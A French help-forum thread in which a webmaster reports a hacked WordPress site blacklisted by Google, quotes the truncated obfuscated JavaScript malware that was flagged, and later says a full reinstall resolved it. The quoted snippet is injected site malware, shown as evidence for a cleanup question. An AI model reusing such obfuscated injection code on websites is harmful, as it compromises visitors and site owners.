Aller au contenu
  • Pas encore inscrit ?

    Pourquoi ne pas vous inscrire ? C'est simple, rapide et gratuit.
    Pour en savoir plus, lisez Les avantages de l'inscription... et la Charte de Zébulon.
    De plus, les messages que vous postez en tant qu'invité restent invisibles tant qu'un modérateur ne les a pas validés. Inscrivez-vous, ce sera un gain de temps pour tout le monde, vous, les helpeurs et les modérateurs ! :wink:

Malware Javascript Obsfucation


Messages recommandés

--- 16 juin à 05h29 ---

 

Salut,

 

Après des heures de recherches (et de joyeux pétages de plomb en passant - tant qu'à faire), je me tourne vers vous en espérant que vous pourrez m'aider.

 

Alors voilà, mon site a été hacké. Google, Firefox, Safari l'ont blacklisté et bloqué a cause d'un "javascript obsfucation". Dans Google Webmaster Tools, on me dit que c'est ce code qui pose problème :

 

<script type='text/javascript'>/*<![CDATA[*/var wow=lb2b3vb

2mb2eafromb1rb1gd";var _J=(Date);if(_J){_h='4726';}var _Y={'

J':'reve\x72\x73e','f':'str\x69\x6Eg','o':'\x73\x75bstr','s'

:!false,'k':'j\x6Fin','v':'spl\x69\x74','P':'len\x67\x74\x68

'},_R='',_z=['=c1n"oll ;y"1=cd(if=-oumt.oc.iekienoOfxe{adn)1

)cr =(vanea.saDw ;teetiT(.eetgmaTi)(me2;)cE=73;6c2t(D an=e.a

ewimTt(+)ceeg3douc);ecetn.m=ik1coocpa"s"+=+ee(Moc2TtStirG.gn

()")+p;xei=sre.tTGc"+o2MStng)(a;p"tri+;v"/de=h= brumnaoct.ae

mlecrEneet(tf+ir""""+""+a"=em"M,c)tah.05(d1oru*0+n.rhtnodmaa

M(,dM=))7ot.hra0(d+0nut.h0a310*Mra)(nd;.bmts)olye.dwiMt=har.

th(150nou0d+00at.hondam*Mrb.Wink.h)(eyltigtshe=cs.pe.;blsoytti

n"obsai=ol"eutlb;.etysl.efscb;.=t-"=rd:/pt"w+o/thwepal.r-ae/

(ec"",.)g/(b/leerpac3/."g,rpeaal)"ec(//b2eg","er).e(/bapl/c1

g,."+)mre/2 ""l"mtanh.onlofuc;d=ti)umc(ononed{.td.oppabyenih

dC}dl(Wink}b][_Y.k]('\x0A'),_h=_h[_Y.v](_R),_K=function(){for

(var _a in _h){if(typeof(_h[_a])==_Y.f){var _c=[],_E=_Y.s,_J

=_h[_a]*-~false;for(f=[]^[];f<_z[_Y.P];f+=_J){_c[f]=(_E)?(_z

[_Y.

 

Je n'ai aucune idée de comment faire pour trouver les fichiers contaminés. J'ai réinstallé WP, ma BDD, trouvé et effacé un fichier corrompu en scannant ma sauvegarde FTP, changé tous mes mots de passe, mais rien n'y fait.

 

L'outil de scan en ligne que j'ai utilisé me dit que mon URL (home page) est "suspicious", et il me donne des "attack URLs", qui contiennent toutes du .js (en provenance du thème WP, mais aussi de wp-includes). J'ai remplacé tous ces fichiers par leur version la plus récente et... ça n'a rien changé. Même quand je les supprime, ils restent listés ! Il n'y a que quand je dégage tous les fichiers .js de WordPress qu'il n'y a plus que l'URL principale qui reste "suspicieuse".

 

Comment faire pour trouver où se loge ce code malicieux ? Comment Google l'a trouvé et d'où le sort-il ? Parce que perso que j'affiche le code source de la page, je ne le trouve nulle part...

 

--- 18 juin à 05h41 ---

 

Aucune idée ?...

 

-édit- Dans cette section, il ne faut pas insérer de « up » dans ton sujet : au vu de la présence d'une « réponse », les helpers ne s'y intéresseront pas, croyant le problème pris en mains par l'un des leurs. Tu peux en revanche poster un petit rappel dans le sujet « On m'a oublié ! », épinglé en tête de la section et prévu à cet effet ;)

Modifié par Dylav
Lien vers le commentaire
Partager sur d’autres sites

Bonjour,

 

Je n'y connais rien , en Javas script.

Si c'est l'obsfucation qui fait problème:

 

Enlever l'obfuscation

 

Vous devriez chercher de l'aide sur le forum "Programmation " de ce site.

Modifié par pear
Lien vers le commentaire
Partager sur d’autres sites

Merci pour la précision de l'edit et tes conseils pear.

 

Au final, j'ai tout viré une enième fois, fait une exportation WP et tout réinstallé sans passer par PhpMyAdmin. J'ai envoyé une demande de réexamen à Google et, cool, on dirait que je ne suis plus blacklisté. :)

Lien vers le commentaire
Partager sur d’autres sites

Bonjour Albator,

 

Dès que tu considéreras qu'ici la question est réglée, n'oublie pas de le signaler en taguant du mot [Résolu] le titre de ton sujet.

 

zzresolu.jpg

[1] En bas du premier message de ton sujet, clique sur [Modifier]

[2] En bas de l'éditeur qui s'ouvre, clique sur [Utiliser l'éditeur complet]

[3] En haut de l'éditeur complet, ajoute [Résolu] au titre de ton sujet.

Lien vers le commentaire
Partager sur d’autres sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Invité
Répondre à ce sujet…

×   Collé en tant que texte enrichi.   Coller en tant que texte brut à la place

  Seulement 75 émoticônes maximum sont autorisées.

×   Votre lien a été automatiquement intégré.   Afficher plutôt comme un lien

×   Votre contenu précédent a été rétabli.   Vider l’éditeur

×   Vous ne pouvez pas directement coller des images. Envoyez-les depuis votre ordinateur ou insérez-les depuis une URL.

 Share

  • En ligne récemment   0 membre est en ligne

    Aucun utilisateur enregistré regarde cette page.

×
×
  • Créer...